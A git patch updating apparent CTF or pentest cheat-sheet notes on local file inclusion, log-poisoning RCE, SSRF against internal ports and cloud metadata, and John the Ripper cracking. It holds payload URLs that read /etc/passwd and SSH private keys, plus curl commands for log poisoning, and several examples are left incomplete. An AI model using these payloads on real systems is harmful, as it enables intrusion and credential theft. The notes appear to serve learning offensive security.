From 1b15af8884255f94d5a1ba23e0bafb117b9fd8d1 Mon Sep 17 00:00:00 2001 From: whx Date: Wed, 1 Sep 2021 00:44:36 +0200 Subject: [PATCH] news --- exploit/web/local_file_inclusion.md | 19 ++++++++--- exploit/web/php/php_user_agent_rce.md | 2 +- exploit/web/ssrf/ssrf.md | 45 ++++++++++++++++++++++++--- hashes/password_cracking/john.md | 14 ++++++++- 4 files changed, 70 insertions(+), 10 deletions(-) diff --git a/exploit/web/local_file_inclusion.md b/exploit/web/local_file_inclusion.md index fa5c97f..a292a04 100644 --- a/exploit/web/local_file_inclusion.md +++ b/exploit/web/local_file_inclusion.md @@ -1,11 +1,12 @@ # Local File Inclusion -To test for LFI what we need is a parameter on any URL or any other input fields like request body etc. For example, if the website is tryhackme.com then a parameter in the URL can look like `https://tryhackme.com/?file=robots.txt`. Here file is the name of the parameter and `robots.txt` is the value that we are passing (include the file robots.txt). +To test for LFI what we need is a parameter on any URL or other inputs, i.e. request body which includes a file. A parameter in the URL can look like `https://test.com/?file=robots.txt`, the file may be changed. ## Usage -* Exploit URL parameter +* Exploit URL parameter by including other files. ``` http://example.com/home?page=about.html +http://example.com/home?page=/etc/passwd ``` * changed to path traversal, with [interesting files](https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi-null-byte-double-encoding-and-other-tricks) ``` @@ -13,7 +14,17 @@ http://example.com/home?page=about.html ``` or ``` - http://example.com/home?page=../../../../home//.ssh/id_rsa + http://example.com/home?page=html/../../../home//.ssh/id_rsa ``` - +### Log Poisoning +* Inject malicious code into logfiles before using path traversal to open the logfile and trigger the rce. +* `www-data` needs read & write permisson in order to do so. +* Include php code into the `User-Agent` header of the HTTP request. For example a GET parameter to deliver system commandsas follows +```sh +curl 'http:///lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host: ' -H 'User-Agent: Mozilla/5.0 Firefox/70.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'DNT: 1' -H 'Upgrade-Insecure-Requests: 1' +``` + * Follow up with a request to + ```HTTP + curl 'http:///lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../' + ``` diff --git a/exploit/web/php/php_user_agent_rce.md b/exploit/web/php/php_user_agent_rce.md index 402710a..fd0004b 100644 --- a/exploit/web/php/php_user_agent_rce.md +++ b/exploit/web/php/php_user_agent_rce.md @@ -1,5 +1,5 @@ # RCE inside HTTP Request - +* a.k.a. Log Poisoning * User Agent can be filled with php code ```sh GET /?view=./dog/../../../../../../../../../var/log/apache2/access.log&ext= HTTP/1.1 diff --git a/exploit/web/ssrf/ssrf.md b/exploit/web/ssrf/ssrf.md index 3e96e80..a26b9bd 100644 --- a/exploit/web/ssrf/ssrf.md +++ b/exploit/web/ssrf/ssrf.md @@ -1,20 +1,30 @@ # Server Side Request Forgery (SSRF) -is a vulnerability in web applications whereby an attacker can make further HTTP requests through the server. An attacker can make use of this vulnerability to communicate with any internal services on the server's network which are generally protected by firewalls. +is a vulnerability in web applications whereby an attacker can make further HTTP requests through the server. An attacker can make use of this vulnerability to communicate with any internal services on the server's network which are generally protected by firewalls. The attack can either be blind or data is returned to the attacker dire tly. ## Usage ### Sanity Test Service Test if input is sanitized by exploiting function. Here it is IP:PORT finding service. Test for localhost ports. -``` +```URL http://127.0.0.1:3306 http://localhost:5432 http://0.0.0.0:53 ``` + * IPv6 -``` +```URL http://[::]:3306 http://:::3006 ``` + +* Cloud info in Link Local IP range `169.254.0.0/16` +```URL +169.254.169.254 --> AWS info +169.254.169.253 --> DNS AWS VPC +169.254.169.123 --> Stratum 3 NTP +127.0.0.1:53 --> systemd DNS +``` + * [Changing input format into hex or encoded](https://gist.github.com/mzfr/fd9959bea8e7965d851871d09374bb72) ### Reading files @@ -22,5 +32,32 @@ http://:::3006 file:///etc/passwd ``` -### Tools +### Request Forgery through GET parameters +* Request app server through parameter +```sh +http:///?url=http:///secret/url +``` +* Request remote resources, or path traversal on remote resource +```sh +http:///?url=/item?id=42 +http:///?url=../../etc/passwd +``` +* Request subdomain URL and cut following unnecessary parameters through `&x=&id=42`. Parameter `x` does not exist. So, it will be ignored +```sh +http:///?url=db.test.com/shop/item?secret=key&x=&id=42 +``` + +### HTML Form +User input through POST form on websites may open files (other MIME types) from server resources. Updating the path reference may yield unintended file content. +```HTML + +``` +This may be used for path traversal +```HTML + +``` +Check return value of the form for result. + +## Tools * [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#file) +* https://requestbin.com diff --git a/hashes/password_cracking/john.md b/hashes/password_cracking/john.md index b8ddf70..11041e2 100644 --- a/hashes/password_cracking/john.md +++ b/hashes/password_cracking/john.md @@ -1,8 +1,20 @@ # John The Ripper +* [Formats](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats) + # Usage * Example -``` +```sh john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ./hash.txt --format=raw-sha256 --fork=2 ``` + +## Declaring Structure +* List subformat +```sh +john --list=subformats +``` +```sh +john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ./hash.txt --format=dynamic_85 --fork=2 +``` +